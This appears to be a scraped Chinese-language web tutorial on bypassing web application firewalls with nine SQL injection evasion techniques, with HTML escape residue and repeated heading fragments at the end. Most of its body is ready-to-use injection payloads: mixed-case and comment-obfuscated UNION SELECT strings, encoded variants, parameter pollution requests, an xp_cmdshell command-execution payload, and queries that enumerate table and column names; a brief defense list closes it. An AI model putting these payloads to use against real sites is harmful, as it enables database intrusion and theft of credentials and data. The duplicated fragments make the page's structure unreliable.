WAF绕过技术详解：9种SQL注入绕过方法<\/h1>

1. WAF基础概念<\/h2>
Web应用程序防火墙(WAF)是一种专门用于过滤、监控和阻止进出Web应用程序HTTP流量的安全设备。与常规防火墙不同，WAF能够针对特定Web应用程序内容进行深度检测。<\/p>

WAF工作原理<\/h3>

协议异常检测<\/strong>：拒绝不符合HTTP标准的请求<\/li>
增强的输入验证<\/strong>：同时进行代理端和服务器端验证<\/li>
白名单和黑名单机制<\/strong><\/li>

基于规则和基于异常的保护<\/strong>：

基于规则：依赖预定义的黑名单<\/li>
基于异常：更灵活，基于行为分析<\/li> <\/ul> <\/li>
状态管理<\/strong>：关注会话保护<\/li>
其他功能<\/strong>：Cookie保护、反入侵规避技术、响应监控和信息披露保护<\/li> <\/ul>
2. WAF绕过技术详解<\/h2>
2.1 大小写变异<\/h3>
原理<\/strong>：利用WAF可能存在的区分大小写检测漏洞<\/p>
示例<\/strong>：<\/p>
http:\/\/target.com\/index.php?page_id=-15 uNIoN sELecT 1,2,3,4 <\/code><\/pre> 特点<\/strong>：<\/p> 将SQL关键字随机大小写混合<\/li> 适用于使用简单字符串匹配的WAF<\/li> <\/ul> 2.2 关键字替换\/分割<\/h3> 原理<\/strong>：在关键字中插入会被WAF过滤的字符<\/p> 示例<\/strong>：<\/p> http:\/\/target.com\/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4 <\/code><\/pre> 变体<\/strong>：<\/p> 将SELECT变为SEL<ECT<\/li> 插入的字符被过滤后，原始关键字仍能执行<\/li> <\/ul> 2.3 编码技术<\/h3> URL编码<\/h4> page.php?id=1%252f%252a*\/UNION%252f%252a \/SELECT <\/code><\/pre> Hex编码<\/h4> target.com\/index.php?page_id=-15 \/*!u%6eion*\/ \/*!se%6cect*\/ 1,2,3,4 SELECT(extractvalue(0x3C613E61646D696E3C2F613E,0x2f61)) <\/code><\/pre> Unicode编码<\/h4> ?id=10%D6‘%20AND%201=2%23 SELECT 'Ä'='A'; #1 <\/code><\/pre> 2.4 注释注入<\/h3> 原理<\/strong>：利用注释混淆WAF的检测<\/p> 示例<\/strong>：<\/p> index.php?page_id=-15 %55nION\/**\/%53ElecT 1,2,3,4 'union%a0select pass from users# index.php?page_id=-15 \/*!UNION*\/ \/*!SELECT*\/ 1,2,3 ?page_id=null%0A\/**\/\/*!50000%55nIOn*\/\/*yoyu*\/all\/**\/%0A\/*!%53eLEct*\/%0A\/*nnaa*\/+1,2,3,4 <\/code><\/pre> 2.5 等价函数替换<\/h3> 常用替换<\/strong>：<\/p> hex()<\/code>, bin()<\/code> → ascii()<\/code><\/li> sleep()<\/code> → benchmark()<\/code><\/li> concat_ws()<\/code> → group_concat()<\/code><\/li> mid()<\/code>, substr()<\/code> → substring()<\/code><\/li> @@user<\/code> → user()<\/code><\/li> @@datadir<\/code> → datadir()<\/code><\/li> <\/ul> 字符串比较技巧<\/strong>：<\/p> substr((select 'password'),1,1) = 0x70 strcmp(left('password',1), 0x69) = 1 strcmp(left('password',1), 0x70) = 0 strcmp(left('password',1), 0x71) = -1 <\/code><\/pre> 2.6 特殊符号利用<\/h3> 示例<\/strong>：<\/p> select `version()`; select+id-1+1.from users; select@^1.from users; Mysql function() as xxx 'se'+'lec'+'t' S%E%L%E%C%T 1 1.aspx?id=1;EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell "net user"') 'or --+2=- -!!!'2 id=1+(UnI)(oN)+(SeL)(EcT) <\/code><\/pre> 2.7 HTTP参数控制<\/h3> HTTP参数污染(HPP)<\/h4> \/?id=1;select+1,2,3+from+users+where+id=1— \/?id=1;select+1&id=2,3+from+users+where+id=1— \/?id=1\/**\/union\/*&id=*\/select\/*&id=*\/pwd\/*&id=*\/from\/*&id=*\/users <\/code><\/pre> 不同Web服务器处理方式：<\/p> PHP\/Apache：只解析最后一个参数<\/li> JSP\/Tomcat：只解析第一个参数<\/li> ASP.NET：合并参数值<\/li> <\/ul> HTTP参数分段(HPF)<\/h4> \/?a=1+union\/*&b=*\/select+1,pass\/*&c=*\/from+users-- 等效于： select * from table where a=1 union\/* and b=*\/select 1,pass\/* limit *\/from users— <\/code><\/pre> HTTP参数污染(HPC)<\/h4> 利用RFC2396定义的保留字符：<\/p> Unreserved: a-z, A-Z, 0-9<\/li> Reserved: ;\/?:@&=+$,<\/li> Unwise: {}|^[]`<>"<\/li> <\/ul> 2.8 缓冲区溢出<\/h3> 原理<\/strong>：利用WAF处理超长字符串时的漏洞<\/p> 示例<\/strong>：<\/p> ?id=1 and (select 1)=(Select 0xA*1000)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 <\/code><\/pre> 2.9 组合绕过技术<\/h3> 原理<\/strong>：结合多种技术提高绕过成功率<\/p> 示例<\/strong>：<\/p> target.com\/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A" uNIOn*\/+\/*!SeLECt*\/+1,2,3,4… id=1\/*!UnIoN*\/+SeLeCT+1,2,concat(\/*!table_name*\/)+FrOM \/*information_schema*\/.tables \/*!WHERE *\/+\/*!TaBlE_ScHeMa*\/+like+database()– ?id=-725+\/*!UNION*\/+\/*!SELECT*\/+1,GrOUp_COnCaT(COLUMN_NAME),3,4,5+FROM+\/*!INFORMATION_SCHEM*\/.COLUMNS+WHERE+TABLE_NAME=0x41646d696e-- <\/code><\/pre> 3. 防御建议<\/h2> 多层防御<\/strong>：不要仅依赖WAF，应结合其他安全措施<\/li> 规则更新<\/strong>：定期更新WAF规则库<\/li> 输入验证<\/strong>：实施严格的输入验证和输出编码<\/li> 最小权限原则<\/strong>：数据库账户使用最小必要权限<\/li> 参数化查询<\/strong>：使用预处理语句而非动态SQL拼接<\/li> 异常监控<\/strong>：监控WAF日志和异常行为<\/li> 压力测试<\/strong>：对WAF进行缓冲区溢出等极限测试<\/li> <\/ol> 4. 总结<\/h2> WAF绕过技术不断发展，攻击者常组合使用多种技术提高成功率。防御方需要采取深度防御策略，结合WAF、安全编码实践和系统加固等多层次防护措施。<\/p>

WAF绕过技术详解：9种SQL注入绕过方法<\/h1>

1. WAF基础概念<\/h2> Web应用程序防火墙(WAF)是一种专门用于过滤、监控和阻止进出Web应用程序HTTP流量的安全设备。与常规防火墙不同，WAF能够针对特定Web应用程序内容进行深度检测。<\/p>

2. WAF绕过技术详解<\/h2>

2.3 编码技术<\/h3>

2.7 HTTP参数控制<\/h3>

4. 总结<\/h2> WAF绕过技术不断发展，攻击者常组合使用多种技术提高成功率。防御方需要采取深度防御策略，结合WAF、安全编码实践和系统加固等多层次防护措施。<\/p>

1. WAF基础概念<\/h2>
Web应用程序防火墙(WAF)是一种专门用于过滤、监控和阻止进出Web应用程序HTTP流量的安全设备。与常规防火墙不同，WAF能够针对特定Web应用程序内容进行深度检测。<\/p>

4. 总结<\/h2>
WAF绕过技术不断发展，攻击者常组合使用多种技术提高成功率。防御方需要采取深度防御策略，结合WAF、安全编码实践和系统加固等多层次防护措施。<\/p>